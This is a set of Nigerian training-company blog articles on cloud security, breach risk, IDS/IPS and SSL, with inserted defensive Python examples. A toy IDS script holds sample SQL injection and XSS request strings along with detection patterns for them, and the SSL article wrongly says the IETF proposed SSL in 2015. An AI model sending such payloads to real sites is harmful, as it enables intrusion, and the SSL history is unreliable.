Project and Research Nigeria

The Four Steps to Bolster Cloud Security - Cloud Computing - Soutech Nigeria

There has been rapid growth in the use of cloud storage, and cloud strategy is gradually moving from ‘cloud-first’ to ‘cloud-only’. This is because cloud computing is expected, in the year 2020, to account for up to about 70% of enterprise software as well as infrastructure.

The growth of public cloud technology has exposed organizations to new security threats that normally cannot be minimized with endpoint security methodologies and technologies.

Security will be compromised without a modern, cloud-native approach. The factors that affect security include:

1. New architectures

The architecture of the cloud is entirely different from that of legacy data centers, which calls for new approaches to security. Traditional tools like penetration testing tools and network scanners are not as reliable here, because the cloud is API-centric.

2. The rise of DevOps

When it comes to using the public cloud, DevOps teams are often on their own, neither involving nor informing the central IT security team. IT security teams need a new way to monitor events, because so many organizations are pushing code changes to production every day.

3. A more sophisticated threat landscape

Attackers have kept pace, using similar tactics to automate their attacks, while DevOps teams have moved toward automating their code deployment process. This means the attack surface has changed and there is no longer a single traffic path that can be monitored. To gain more visibility, security teams have resorted to deploying new tools across all aspects of the organization's cloud applications.

The four-step program for bolstering cloud security

The issues surrounding cloud security can be addressed with modern, cloud-native platforms that make automation easy, providing continuous monitoring and, beyond that, analysis and remediation for cloud security compliance. This model offers far better protection in the cloud than traditional security platforms. Top cloud security experts have revealed that, to achieve continuous and automated cloud security and compliance, four key elements have to be addressed:

  1. Real-time discovery to match the increasing pace of cloud changes: It is not unusual for firms and organizations to have millions of data points that require evaluation, given the increasing complexity of cloud deployments. A platform that can handle all this data in real time, rapidly isolating any security deviation from a known-good state, is needed to keep the cloud functional.
  2. Automated action: Organizations must automate monitoring and remediation of these processes to keep up. They also need flexibility in determining how automated responses are made, and they must be able to inform human administrators when any other action is needed.
  3. Deep insights to identify risks that may not be obvious: Communication can falter when the number of teams is large. Your platform should allow teams to take ownership of their own security while giving security operations and corporate management the bigger picture across all teams. The platform must be able to evaluate security information against the global customer base, or across time and geography, to warn of potential issues before they occur.
  4. Robust reporting: Teams must be able to put together comprehensive, properly detailed reports about their daily security compliance, not only during the yearly audit. You should be able to view the past and present state of your security and compliance posture at a glance.
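As an added example (not code from the article or from any vendor it mentions), the script below shows what element 1 and element 2 look like in practice: a snapshot of cloud resource settings is compared against a known-good baseline, every deviation is reported with a severity, and each finding is either reverted automatically or escalated to a human, depending on a per-setting policy. The resource names, settings, baseline and policy table are all constructed for the demo.

```python
"""Added example (not from the Soutech article): a small change-detection loop
that compares a snapshot of cloud resource configuration against a known-good
baseline, flags deviations, and decides whether to auto-remediate or escalate
to a human.  All resource names, fields and snapshots below are constructed
for the demo; they are not real cloud data."""
from typing import Dict, List, Tuple

# Known-good baseline: what each resource's security-relevant settings should be.
BASELINE: Dict[str, Dict[str, object]] = {
    "s3:customer-backups": {"public_read": False, "encryption": "aes256", "versioning": True},
    "sg:web-tier":         {"ssh_open_to_world": False, "ports": [80, 443]},
    "iam:deploy-role":     {"mfa_required": True, "admin_policy": False},
}

# Severity of a deviation per field, and whether it is safe to revert automatically.
# (Constructed policy; an organisation would tune this to its own risk appetite.)
POLICY: Dict[str, Tuple[str, bool]] = {
    "public_read":       ("high",   True),
    "encryption":        ("high",   False),
    "versioning":        ("medium", True),
    "ssh_open_to_world": ("high",   True),
    "ports":             ("medium", False),
    "mfa_required":      ("high",   False),
    "admin_policy":      ("high",   False),
}

def detect_drift(snapshot: Dict[str, Dict[str, object]]) -> List[dict]:
    """Return one finding per field whose observed value differs from the baseline,
    plus a finding for any baseline resource that has disappeared."""
    findings = []
    for resource, expected in BASELINE.items():
        observed = snapshot.get(resource)
        if observed is None:
            findings.append({"resource": resource, "field": "*", "expected": "present",
                             "observed": "missing", "severity": "high", "action": "notify"})
            continue
        for field, want in expected.items():
            got = observed.get(field)
            if got != want:
                severity, auto_ok = POLICY.get(field, ("medium", False))
                findings.append({"resource": resource, "field": field, "expected": want,
                                 "observed": got, "severity": severity,
                                 "action": "auto-remediate" if auto_ok else "notify"})
    return findings

def remediate(snapshot: Dict[str, Dict[str, object]], findings: List[dict]):
    """Apply the baseline value for every auto-remediable finding and return the
    corrected snapshot; everything else is left for a human to handle."""
    fixed = {r: dict(cfg) for r, cfg in snapshot.items()}
    for f in findings:
        if f["action"] == "auto-remediate":
            fixed[f["resource"]][f["field"]] = f["expected"]
    return fixed

# Constructed "current state" snapshot: two settings have drifted, one resource is gone.
SNAPSHOT = {
    "s3:customer-backups": {"public_read": True, "encryption": "aes256", "versioning": True},
    "sg:web-tier":         {"ssh_open_to_world": False, "ports": [80, 443, 8080]},
}

if __name__ == "__main__":
    for f in detect_drift(SNAPSHOT):
        print(f"[{f['severity']}] {f['resource']}.{f['field']}: "
              f"expected {f['expected']!r}, observed {f['observed']!r} -> {f['action']}")
```

Running it on the constructed snapshot yields three findings: the now-public bucket is reverted automatically, the extra open port is escalated because port changes are marked as needing review, and the missing IAM role is escalated because a deleted resource cannot be safely recreated by a rule. In a real deployment the snapshot would be fed from the provider's API on every change event rather than built by hand.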

In conclusion, as organizations and firms increasingly rely on the public cloud to drive their daily business activities, they should also focus on the security risks and simplify the processes involved in assuring protection and compliance. Continuous security and compliance present new opportunities to maximize the value of the public cloud while minimizing the risk.

It is very important to focus on the key characteristics of automation, deep insights, robust reporting and real-time discovery when evaluating potential cloud security platforms. There is a popular saying in the IT world that deploying cloud technology changes everything, but what does not change is the importance of ensuring security and compliance.

To learn more about cloud security as well as other security methodologies such as vulnerability assessments, risk assessments and penetration testing, subscribe to our services at Soutech Ventures to learn the CEH course in detail.

Cybersecurity breaches are inevitable; what to do to stay safe - Information Security Tips - SOUTECH Nigeria

Cybersecurity threats have become a cause for concern for many organizations, especially with the daily reports of cyber intrusions involving the theft of large volumes of data and intellectual property. With the rise of new exploitation techniques and methods such as insider threats, ransomware and advanced persistent threats, the need to invest in cybersecurity cannot be overemphasized.

It has also proven difficult to find ready solutions to cyberattacks because of the dynamism of cloud computing, the operating environment, mobile support, the IoT (Internet of Things), remote users, the need to support the network devices that users bring into their offices, and of course the question of how, where and which specific security strategies to deploy.

James Comey, a former director of the FBI, described two kinds of big companies in the United States. He categorized them “into those who have been hacked by the Chinese and those who have not been hacked by the Chinese.” About a year later, in January 2015 at the World Economic Forum, John Chambers, a former CEO of Cisco, confirmed that the people who have been hacked do not even know they have been hacked.

Given all this information, does it mean that cybersecurity breaches are inevitable? And if a cybersecurity breach is inevitable, is prevention really possible, and is trying to secure data and data systems worth the money?

Despite how discouraging these remarks are, organizations still go ahead and store financial data, intellectual property and personal data on networked systems. In the midst of all these risks, the good sides of data storage and security outweigh the bad sides.

Cybersecurity involves managing risks

Even though cybersecurity breaches cannot be entirely avoided, there are things that should be put in place to secure information. In environments where risk is managed, there are processes that can be put in place to help avoid data breaches, which I described in my previous article as penetration testing, vulnerability assessments and IT audits. The premise of risk management is that the risk scenario cannot be completely eliminated.

If these uncertainties could be erased, the risk could be erased as well. Where the risk of a cybersecurity breach is not zero, there are two basic security measures that can be put in place. The first strategy is to cut down the probability that a cybersecurity breach occurs, and the second is to cut down the impact, that is, the damage that occurs when a cybersecurity risk materializes. These two strategies are appropriate for managing any type of cybersecurity risk. Do not forget that the general approach to cybersecurity is very transparent and easy to understand.

The first thing to identify in the operation of a business is its assets: the information assets, which include raw data, people, processes and technology, that have to be protected.

The second thing to note is that the purpose of a risk assessment is to reveal risk scenarios that could lead to damage or loss of data through unauthorized and unexpected disclosure, modification, or loss of confidentiality of data assets. The components of risk are few. The typical cybersecurity intrusion scenario is a threat leveraging a vulnerability to damage the security of an information asset. In this scenario the components of risk are: a vulnerability exists, an exploit takes advantage of that vulnerability, and a threat actor uses that exploit to damage the information asset's security. Therefore, the only component the network security manager can control is the presence of vulnerabilities on the network. The next step is to identify the risk and eliminate it.

Typically, once a risk has been identified it can be eliminated, and when a vulnerability is eliminated, every threat scenario in which that vulnerability is exploited is reduced to zero.

Cybersecurity Risk Prioritization

Risk management at its core is a decision-support tool. Once all the relevant cybersecurity scenarios have been unraveled, the job of the decision-support tool is to prioritize the order and manner in which the identified risks are mitigated or controlled.

If there are insufficient resources to handle all the identified vulnerabilities, then prioritizing risks for remediation and mitigation is clearly important. Prioritization is also valuable even when resources are sufficient to remediate all the existing vulnerabilities.

Outcome vs Impact

Vulnerabilities are prioritized by their potential impact on the organization if the risk scenarios exploiting that vulnerability are realized. If potential impact is the prioritization factor, it is important to understand what impact is. Whenever a vulnerability is exploited there is an unwanted outcome: an unwanted disclosure of data, an unauthorized modification, or the loss of access to the information asset affected by the exploited vulnerability. The result of an unwanted outcome is referred to as the impact.

Under the HIPAA privacy or security rules, if health records are stolen, the outcome is that information is disclosed, but the impact on the organization is that there will be mandatory breach notification costs and the potential for fines and civil penalties that could run into millions of naira and dollars.

Vulnerability mitigation can be prioritized by potential impact in different ways. One of them is to use a prioritization tool called the Common Vulnerability Scoring System (CVSS), which provides a framework for understanding the characteristics and impacts of vulnerabilities in information technology.

When CVSS is used, there is a likelihood that when an organization finds a risk has been prioritized as low or medium severity, it will choose not to remediate it. But organizations with many systems, including mission-critical systems, need to understand that the potential impact to that asset and to the organization does not depend solely on the CVSS rating; it could be higher, and the organization then needs to remediate the vulnerability.
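The point above, that a CVSS rating alone is not the remediation priority, is easiest to see with numbers. The script below is an added example (not part of the article) that ranks findings by the CVSS base score weighted by the business criticality of the affected asset and its exposure; the asset list, criticality scale, exposure weighting and the placeholder CVE identifiers are all constructed for the demo, while the severity bands in `cvss_band` are the qualitative ratings defined by the CVSS v3.x specification.

```python
"""Added example (not from the article): ranking vulnerabilities for remediation
using the CVSS base score together with the business impact of the affected
asset, so that a 'medium' CVSS finding on a mission-critical system can outrank
a 'critical' finding on a lab box.  The asset list, findings, weights and the
CVE-XXXX placeholders are constructed for the demo."""
from dataclasses import dataclass
from typing import List

def cvss_band(score: float) -> str:
    """CVSS v3.x qualitative severity rating for a base score."""
    if score == 0.0:
        return "none"
    if score < 4.0:
        return "low"
    if score < 7.0:
        return "medium"
    if score < 9.0:
        return "high"
    return "critical"

@dataclass
class Finding:
    asset: str
    cve: str            # placeholder identifiers below; not real CVE numbers
    cvss_base: float    # 0.0-10.0 base score
    internet_facing: bool

# Constructed asset criticality: impact of loss or disclosure on a 1-5 scale.
ASSET_CRITICALITY = {
    "ehr-db-01":     5,   # patient records: notification costs, fines, penalties
    "payroll-app":   4,
    "marketing-web": 2,
    "lab-vm-07":     1,
}

def risk_score(f: Finding) -> float:
    """Impact-weighted priority: CVSS base score x asset criticality, with a
    bump for internet exposure (a constructed weighting, not a standard formula)."""
    exposure = 1.25 if f.internet_facing else 1.0
    return round(f.cvss_base * ASSET_CRITICALITY.get(f.asset, 3) * exposure, 2)

def prioritize(findings: List[Finding]) -> List[Finding]:
    """Remediation order: highest impact-weighted risk first."""
    return sorted(findings, key=risk_score, reverse=True)

# Constructed findings: note the 9.8 on the lab VM and the 5.3 on the records database.
FINDINGS = [
    Finding("lab-vm-07",     "CVE-XXXX-0001", 9.8, False),
    Finding("ehr-db-01",     "CVE-XXXX-0002", 5.3, False),
    Finding("marketing-web", "CVE-XXXX-0003", 7.5, True),
    Finding("payroll-app",   "CVE-XXXX-0004", 6.1, False),
]

if __name__ == "__main__":
    for f in prioritize(FINDINGS):
        print(f"{f.asset:14} {f.cve} cvss={f.cvss_base:>4} ({cvss_band(f.cvss_base):8}) "
              f"priority={risk_score(f)}")
```

With these inputs the "medium" 5.3 on the records database ranks first and the "critical" 9.8 on the lab VM ranks last, which is exactly the situation the paragraph warns about: a team that filters on CVSS severity alone would defer the finding that carries the largest impact.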

In conclusion, if it is true that cybersecurity breaches cannot be avoided, all is not lost. The only sad thing is that it will not be possible to completely eliminate the uncertainty that there will be data breaches.

To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at Soutech Ventures to learn the CEH course in detail.

The Need for an Automated Approach to Cloud Security and Compliance - Challenges in Cloud Computing - Soutech Nigeria

Regardless of whether you are in charge of general IT, IT security, DevOps or regulatory compliance, the odds are that public cloud services are a steadily growing part of your portfolio. This can be great for the business, enabling lower costs, greater agility and faster time to market. However, it can present new and serious difficulties in guaranteeing security and compliance.

The public cloud is a radically new world. If you think the traditional techniques of securing the data center or firewalling the perimeter will keep your data and applications secure, you may be in for a reality check. The main problem with a legacy approach is that it was not designed for the cloud era, which means it does not support or make use of the API-driven infrastructure of the public cloud.

Whatever your role in your organization, you can gain huge advantages by embracing a modern, cloud-native model that uses purpose-built tooling to continuously and automatically monitor and manage security and compliance along the API control plane.

If you are in charge of IT, security or compliance, you can reduce costs, enhance security and assert greater control over cloud technology and shadow IT. If you are in DevOps, you can move rapidly without waiting for approvals from security, while eliminating the potential for the disaster that is always looming when appropriate security and compliance checks and balances are not in place.

Given the proper cloud security platform, the whole organization can make use of automation to decrease risk and remove the human element from critical procedures. Automation enables you to achieve continuous visibility over your cloud deployments, allowing reliable replication across usage environments such as development, staging and production.

Automation, security, compliance and the cloud

Cloud adoption moves too rapidly, and is subject to changes that come too fast, for organizations and firms to depend on manual resources. The major challenge, however, is that most organizations still use legacy tools, technologies and methodologies to manage cloud security and compliance.

Luckily, new cloud-native solutions are now available, delivering an agentless platform designed specifically for modern clouds.

These solutions use the cloud's API architecture to achieve enormous flexibility in scaling and managing cloud security and compliance.

The steps below depict how an advanced, automated approach to continuous cloud security and compliance works. It is based on the Evident Security Platform from the leading cloud security firm Evident.

Step 1

Close observation: The cloud computing environment evolves continuously. These changes can be the ordinary, routine activities of your DevOps or IT teams; they can also be the work of individuals who mean to do harm to your business. As changes are made across all cloud platforms, services and regions, the cloud security platform monitors the configuration of the cloud infrastructure to ensure that it adheres to security and compliance best practices.

Step 2

Assessment: The security platform securely gathers information about the services in your cloud and constantly checks it against a set of predetermined security best practices. It also checks it against any predefined custom signatures. These checks determine, on a continuous basis, whether there are any potentially exploitable vulnerabilities.

Step 3

In-depth analysis: The platform then performs an analysis in which the misconfigurations and exposures are prioritized and quantified into high, medium or low risk levels.

Step 4

Automated remediation: The result of the analysis is shown on a dashboard and can be sent to integrated systems for auto-remediation workflows to kick in.

Step 5

Robust reporting: Comprehensive and detailed reports are made available so that your teams can see data about the risk, as well as user attribution and the affected assets.

Step 6

Correction: The teams can then use simple-to-follow remediation methodologies to restore the infrastructure to a safe state.
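The six steps above are a pipeline, and the added example below runs a miniature version of it end to end. It is not Evident's code or the article's: a constructed feed of change events (who changed which resource to what) is assessed against built-in best-practice signatures plus one custom signature, findings are ranked high/medium/low, auto-fixable ones are corrected, the rest are queued for a human, and a report with user attribution is produced. Every event, signature and fix in it is constructed for the demo.

```python
"""Added example (not Evident's code or the article's): a miniature version of
the observe / assess / analyse / remediate / report / correct loop, run over a
constructed change-event feed.  Signatures are predicates over a resource's
configuration, paired with a fix and a flag saying whether the fix may be
applied automatically.  All names, events and signatures are constructed."""
from collections import Counter
from typing import Callable, Dict, List, Tuple

# Step 1 (observe): a constructed stream of configuration change events.
EVENTS = [
    {"user": "alice", "resource": "bucket:logs",    "config": {"public": False, "encrypted": True}},
    {"user": "bob",   "resource": "bucket:exports", "config": {"public": True,  "encrypted": False}},
    {"user": "ci",    "resource": "sg:api",         "config": {"ingress": ["0.0.0.0/0:22", "0.0.0.0/0:443"]}},
    {"user": "carol", "resource": "db:orders",      "config": {"backup_days": 3, "encrypted": True}},
]

# Step 2 (assess): signature = (name, severity, auto_fix, check, fix).
Signature = Tuple[str, str, bool, Callable[[dict], bool], Callable[[dict], dict]]
BEST_PRACTICE: List[Signature] = [
    ("public-bucket", "high", True,
     lambda c: c.get("public") is True,
     lambda c: {**c, "public": False}),
    ("unencrypted-storage", "high", False,            # needs a human: re-encrypting data is not a flag flip
     lambda c: c.get("encrypted") is False,
     lambda c: c),
    ("ssh-from-anywhere", "high", True,
     lambda c: "0.0.0.0/0:22" in c.get("ingress", []),
     lambda c: {**c, "ingress": [r for r in c["ingress"] if r != "0.0.0.0/0:22"]}),
]
# An organisation-specific custom signature, evaluated alongside the built-in ones.
CUSTOM: List[Signature] = [
    ("short-backup-retention", "medium", False,
     lambda c: "backup_days" in c and c["backup_days"] < 7,
     lambda c: c),
]

def assess(events: List[dict], sigs: List[Signature]) -> List[dict]:
    """Steps 2-3: run every signature over every event and rank the hits by severity."""
    rank = {"high": 0, "medium": 1, "low": 2}
    findings = []
    for ev in events:
        for name, sev, auto, check, _ in sigs:
            if check(ev["config"]):
                findings.append({"signature": name, "severity": sev, "auto_fix": auto,
                                 "resource": ev["resource"], "user": ev["user"]})
    return sorted(findings, key=lambda f: rank[f["severity"]])

def remediate(events: List[dict], findings: List[dict], sigs: List[Signature]):
    """Steps 4 and 6: apply the fix for auto-fixable findings; return the corrected
    event list and the findings that still need a human."""
    fixes = {name: fix for name, _, _, _, fix in sigs}
    corrected = [dict(ev, config=dict(ev["config"])) for ev in events]
    by_resource = {ev["resource"]: ev for ev in corrected}
    manual = []
    for f in findings:
        if f["auto_fix"]:
            ev = by_resource[f["resource"]]
            ev["config"] = fixes[f["signature"]](ev["config"])
        else:
            manual.append(f)
    return corrected, manual

def report(findings: List[dict]) -> Dict[str, object]:
    """Step 5: summarise by severity, attribute each finding to the user whose
    change introduced it, and list the affected resources."""
    return {"by_severity": dict(Counter(f["severity"] for f in findings)),
            "by_user": dict(Counter(f["user"] for f in findings)),
            "affected": sorted({f["resource"] for f in findings})}

if __name__ == "__main__":
    found = assess(EVENTS, BEST_PRACTICE + CUSTOM)
    fixed, todo = remediate(EVENTS, found, BEST_PRACTICE + CUSTOM)
    print(report(found))
    print("still needs a human:", [f["signature"] for f in todo])
    print("re-check after fixes:", [f["signature"] for f in assess(fixed, BEST_PRACTICE + CUSTOM)])
```

The re-check at the end is the part worth copying: after automated correction the same signatures are run again, so the dashboard shows only what genuinely remains (here the unencrypted bucket and the short backup retention), and the attribution in the report tells the team which user's change to follow up.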

Conclusion

The public cloud is not going to be phased out any time soon; before the decade is over, the public cloud services market will surpass $230 billion, as predicted by Forrester Research. As the cloud becomes more central to the success of your organization, it is key that you concentrate on security and compliance, regardless of whether your role is in IT, security, DevOps or corporate governance and compliance.

By embracing a continuous security model, your organization will have the capacity to handle the many procedures that would overwhelm your teams and systems if they had to be done manually. This not only provides stronger security and compliance assurances, it also relieves the burden on your staff, enhances security for DevOps and other teams, and lowers the cost and risk of cloud security and compliance.

Cloud computing and its associated technologies form a very broad field, but in a few of my write-ups I have been able to discuss some of the trends and challenges being faced in the cloud environment. To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at Soutech Ventures to learn the CEH course in detail.

Six Important Benefits of IDS/IPS in Your Business - Secure Your Network - Tips from SOUTECH Nigeria

Intrusion detection systems (IDSs) and intrusion prevention systems (IPSs) have been very effective over the years in countering cyberattacks and in securing both the network perimeter and the segments of the internal network. They serve as extra eyes in protecting data from loss, unauthorized access and any form of damage that could lead to collateral damage to the organization in both monetary terms and reputation.

Now, the usage and effectiveness of these devices and technologies can only survive when there is sufficient manpower and training. Organizations and network administrators must understand that the use of IDSs and IPSs requires training in order to interpret and act on their results.

The benefits of deploying IDS/IPS technology in businesses include:

  • Identifying the number and type of security incidents.
  • Making sure security events do not escalate into security incidents.
  • Improving the ability to discover network devices.
  • Protecting vulnerable assets.
  • Protecting operating systems and application software.
  • Using all the information obtained to meet various regulatory requirements.

Now let us explore the benefits of IDS/IPS in information security.

1. Identifying security incidents

IDS/IPS technologies not only help to capture logs of the IP addresses and ports of communication between different systems, but can also be used to identify specific content inside a network packet. For example, they can identify reports sent to botnet controllers from compromised endpoint devices, and can also identify DDoS attacks.

The sensors in a modern IDS/IPS can help to quantify the types and numbers of attacks an organization is exposed to, and can further help it alter existing security controls and deploy new ones. They can also identify bugs in software and address host and network device configuration issues. The results can be used to perform further risk assessments.

2. Preventing security incidents

Deploying IDS/IPS technology can help to prevent security incidents by disrupting communication between an attacker and the target; it can also report security incidents. Sensors in a modern IDS/IPS can take packets from the network and examine them in the context of the protocols carrying them. For example, an HTTP-based attack such as cross-site scripting or SQL injection can be detected and blocked. IDS/IPS sensors can also identify and block anomalous behavior, such as unexpected outbound traffic.

3. Protecting vulnerable assets

IDS/IPS have evolved to act as virtual patches for some software vulnerabilities. This enables network administrators to block attacks until patches have been developed for those vulnerabilities, and to defer the cost of replacing systems until the patches are ready. The ability to identify patch levels can be very useful for gauging patch deployment and for automating vulnerability assessments.

4. Identifying network devices and hosts

IDS/IPS sensors can also be used to passively detect the presence of network devices and hosts. They do this based on:

  • The data within network packets, observed in real time.
  • Identification of the operating systems and services offered by the network device or host.

This can eliminate a great deal of the manual work involved in determining the number of systems available and their configurations. Apart from helping to automate hardware inventories, IDS/IPS can be used to identify rogue devices on the network, such as unauthorized hosts, rogue wireless access points and rogue hotspots.
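The two capabilities described in benefits 2 and 4, content inspection of packets and passive discovery of hosts and services, come from the same sensor pass, so the added example below (not code from the article or any IDS product) does both over one constructed packet feed. It builds an inventory of which host answers on which service from the banners it sees, flags hosts absent from an authorised list, and matches HTTP payloads against two coarse content signatures for the SQL injection and cross-site scripting cases the text mentions, returning a pass/alert/block verdict per packet. The packets, the authorised-host list and the signature patterns are all constructed for the demo.

```python
"""Added example (not from the article): a toy IDS/IPS sensor run over a
constructed packet feed.  It (a) passively inventories hosts and the services
they answer on, flagging devices not in an authorised list, and (b) inspects
payloads against content signatures, returning a verdict per packet and a
tally of incident types.  Packets, signatures and the authorised-host list
are all constructed for the demo."""
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Constructed packet records: (src, dst, dport, protocol, payload).  Replies
# whose payload starts with a service banner let the sensor learn what a host runs.
PACKETS: List[Tuple[str, str, int, str, str]] = [
    ("10.0.0.5",  "10.0.0.20", 80, "tcp", "GET /index.html HTTP/1.1"),
    ("10.0.0.20", "10.0.0.5",  80, "tcp", "HTTP/1.1 200 OK\r\nServer: nginx/1.18.0"),
    ("10.0.0.7",  "10.0.0.20", 80, "tcp", "GET /login?user=admin'%20OR%20'1'='1 HTTP/1.1"),
    ("10.0.0.7",  "10.0.0.20", 80, "tcp", "GET /search?q=<script>alert(1)</script> HTTP/1.1"),
    ("10.0.0.99", "10.0.0.20", 22, "tcp", ""),                     # host not in the inventory
    ("10.0.0.20", "10.0.0.99", 22, "tcp", "SSH-2.0-OpenSSH_8.9"),  # banner reveals an SSH service
]

AUTHORISED_HOSTS = {"10.0.0.5", "10.0.0.7", "10.0.0.20"}

# Content signatures over the payload: (name, pattern, block?).  Deliberately
# coarse, like the first-line patterns an IDS ships for SQLi and XSS.
SIGNATURES = [
    ("sqli-tautology", re.compile(r"'(%20|\s)*OR(%20|\s)+'", re.I), True),
    ("xss-script-tag", re.compile(r"<script\b", re.I), True),
]
# Banner prefix -> service name (constructed, minimal).
BANNERS = [("SSH-", "ssh"), ("HTTP/1.", "http")]

def inspect(packets: List[Tuple[str, str, int, str, str]]):
    """One pass over the feed.  Returns (inventory, rogue_hosts, verdicts, incident_counts)."""
    inventory: Dict[str, set] = defaultdict(set)   # host -> services it answered on
    seen_hosts = set()
    verdicts = []
    incidents = Counter()
    for src, dst, dport, _proto, payload in packets:
        seen_hosts.update((src, dst))
        # Passive discovery: a reply carrying a service banner tells us the
        # sending host offers that service on that port.
        for prefix, service in BANNERS:
            if payload.startswith(prefix):
                inventory[src].add(f"{service}/{dport}")
        # Content inspection: first matching signature decides the verdict.
        verdict = "pass"
        for name, pattern, block in SIGNATURES:
            if pattern.search(payload):
                incidents[name] += 1
                verdict = "block" if block else "alert"
                break
        verdicts.append(verdict)
    rogue = sorted(seen_hosts - AUTHORISED_HOSTS)
    return dict(inventory), rogue, verdicts, dict(incidents)

if __name__ == "__main__":
    inv, rogue, verdicts, counts = inspect(PACKETS)
    print("inventory:", inv)
    print("rogue hosts:", rogue)
    print("verdicts:", verdicts)
    print("incidents:", counts)
```

The inventory and incident tally are the two outputs the text says feed later work: the tally is what you would quantify attack types from (benefit 1) and the inventory, compared against the authorised list, is how an unexpected host such as 10.0.0.99 surfaces (benefit 4). A production sensor would of course decode the transport and HTTP layers properly rather than regex the raw payload.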

5. Leveraging the information gained to meet regulatory requirements

IDS/IPS can give an organization deep insight into its networks and connected resources. Regulatory mandates can also be met: for example, PCI-DSS requirement 1.1.6 calls for documentation and business justification of the use of all services and protocols, and this can be researched using reports obtained from IDS/IPS logs.

6. Improving the return on investment (ROI)

IDS/IPS have been associated with improved efficiencies and related savings in labour costs. An organization can determine how much return on investment (ROI) IDS/IPS can supply if the infrastructure is able to reduce or completely mitigate two major things:

  • Degradation or denial of internet service and/or internal network service, such as application downtime and its business ramifications.
  • A security breach involving the loss of sensitive customer information and credentials, as well as intellectual property.

My advice to network administrators is to explore the use of IDS/IPS further to boost the business, and to ensure that, beyond their basic functions, they harness the other functionalities of these devices.

To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at Soutech Ventures to learn the CEH course in detail.

What You Don’t Know Can Hurt You - Cloud Security Issues Revealed - SOUTECH Nigeria

One of the major issues that Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs) face is gaining visibility into their cloud security posture. How can they be expected to put the proper and necessary controls and security measures in place if they cannot even identify where the security flaws are?

Without a new approach, the problems promise to get a whole lot worse before they get better. Why? Let us count the ways:

1. Growth of the public cloud: Organizations have now deployed cloud services to a far greater degree than ever before. According to one study, the average enterprise now uses about 1,427 cloud services.

2. Shadow IT: Many of the publicly available cloud services and applications adopted on the initiative of shadow IT are out of the control of the security teams, and the line-of-business managers responsible seem unfamiliar with security and compliance best practices.

3. DevOps: As I mentioned in my follow-up article on DevOps, DevOps teams have continued to outpace security teams, going out on their own to deploy public cloud services to speed up their development. These teams often do not want to be held back by security and compliance concerns.

4. Tools and technologies that have become obsolete: Traditional tools for monitoring and remediating endpoints, built for data center environments, cannot be effective or efficient for securing public clouds.

5. The pace of change: Cloud environments change too quickly for manual processes to keep pace, even if we assume that organizations are able to hire and retain personnel trained and experienced in cloud security management and compliance. CISOs and CIOs need to worry about complacency in the use of cloud storage, because public cloud providers like Amazon Web Services and Microsoft Azure have stepped up their game in the past couple of years, and surveys show that IT heads are consequently becoming less worried about the security challenges of the cloud environment. It has also been found that the biggest risks usually lie more in the internal network than in the external network.

6. The relationship between automation, visibility and continuous security and compliance: The question, therefore, is how CIOs and CISOs gain the visibility they need in order to minimize risk and maximize protection. The simple answer is automation. By automating remediation, analysis and monitoring across the whole cloud environment, security teams can gain the visibility they need to address their biggest cloud security and compliance challenges. The architecture of the cloud makes it a perfect fit for an automated approach to security and compliance, because the cloud environment's API model supports cloud-native, agentless solutions. These can be deployed to give IT security and DevOps teams tremendous visibility and flexibility. With an automated model, CIOs and CISOs can:

  • Obtain a big-picture view across all their cloud environments, with a centralized means to manage and control events.
  • Allow DevOps and other teams to manage the security and compliance best practices needed for their own cloud deployments and controls.
  • Lower costs and reduce risk and complexity by replacing manual tasks with automated processes.
  • Improve time to value by securely making use of the public cloud to empower smaller teams, whether individual lines of business or DevOps.
  • Flag risks and remediate threats before they get a chance to affect availability, compliance and operations.

Finally, public cloud services have created a plethora of openings for security officers to deliver significant value to their establishments through lower costs, accelerated development cycles and greater productivity. However, many risks lie masked behind these opportunities, and those risks surround security and compliance. The good news is that there is a path to success through automation, providing continuous security and continuous compliance. This is the time to take the first step towards cloud security.

To learn more about cloud security as well as other security methodologies such as vulnerability assessments, risk assessments and penetration testing, subscribe to our services at Soutech Ventures to learn the CEH course in detail.

The Secure Sockets Layer and How It Secures Your Internet Sessions - Be Educated - SOUTECH Nigeria

I’ll be teaching here on the Secure Sockets Layer, because I believe most of us have heard of SSL as a protocol but do not know how it works; don’t worry, I’ve got you. What is SSL?

Secure Sockets Layer is a protocol used in computer networks to secure the connections between network application clients and servers over insecure networks such as the internet. SSL was proposed for use on the internet by the Internet Engineering Task Force (IETF) in 2015 because of the many protocol and implementation flaws and vulnerabilities found in other internet protocols. It has, however, been replaced by the TLS (Transport Layer Security) protocol. TLS and SSL are not compatible with each other, and TLS is deployed in place of SSL 3.0.

SSL was originally developed as a proprietary protocol in the 1990s to allow Netscape browser clients working over HTTP (Hypertext Transfer Protocol) to communicate securely with Netscape web servers. SSL was eventually adopted to secure authentication and encryption in network transport layer communications.

Encryption standard used in SSL

SSL uses two kinds of keys, a public key and a symmetric key, to encrypt the connection when two machines establish a session. These machines are typically a web or mail server and a client system communicating over the internet or some other TCP/IP network. SSL ensures that data sent between two processes working in the client-server model is encrypted and authenticated.

SSL works above the transport and network layers, which are responsible for transporting data packets between processes and routing network traffic between a client and server. It also works below application layer protocols like the popular HTTP and SMTP (Simple Mail Transfer Protocol).

Ever wondered what the word ‘socket’ in the term SSL refers to? It refers to the sockets method by which data is transported between a client and server program on a network, or between processes running on the same computer.

As I said, the TLS protocol was developed from SSL and has phased it out, but the terms SSL and SSL/TLS are still commonly used to refer to the protocol that protects internet traffic. SSL/TLS is the most widely deployed security protocol in use today and is known to secure about 50% of the pages loaded in the Google Chrome browser. Beyond web pages, SSL has been implemented for applications such as email, file transfer, VoIP and instant messaging.

How does SSL work?

The SSL protocol has two major sub-protocols:

  • The Record Protocol: This protocol defines how the communicating hosts exchange data via SSL, including specifications for how data is prepared before transmission and how received data is verified and decrypted.
  • The Handshake Protocol: This protocol defines how the client and server establish an SSL connection. This includes negotiating which cryptographic systems each host is willing or unwilling to use, and the exchange of cryptographic material, which includes the session keys and public keys used for the encryption or authentication of transmitted data.

Now, during the handshake, the first thing that happens is that the server presents its digital certificate in order to authenticate itself to the client. Server certificates use the X.509 certificate standard format, which is defined by the public key cryptography standards. For authentication, public key cryptography is used to validate the digital certificate and confirm that the server is who it claims to be.

Once the server is authenticated, the client and the server establish the cipher settings and a shared key that will be used to encrypt the information exchanged until the session expires. In this way, data confidentiality and integrity are assured, and the whole process is invisible to the user.

